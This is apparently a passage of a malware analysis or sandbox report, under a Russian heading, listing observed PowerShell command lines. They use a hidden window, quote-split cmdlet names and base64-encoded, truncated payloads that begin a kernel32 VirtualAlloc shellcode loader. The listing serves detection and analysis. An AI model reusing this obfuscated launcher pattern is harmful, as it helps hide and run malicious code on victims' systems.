Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v ekd -;s''v omd e''c;s''v La ((g''v ekd).value.toString()+(g''v omd).value.toString());powershell (g''v La).value.toString() ('JABLAHUAIAA9ACAAJwAkAE0AYQAgAD0AIAAnACcAWwBEAGwAbABJA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v ekd -;s''v omd e''c;s''v La ((g''v ekd).value.toString()+(g''v omd).value.toString());powershell (g''v La).value.toString() ('JABLAHUAIAA9ACAAJwAkAE0AYQAgAD0AIAAnACcAWwBEAGwAbABJA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JABLAHUAIAA9ACAAJwAkAE0AYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e''c JABNAGEAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB...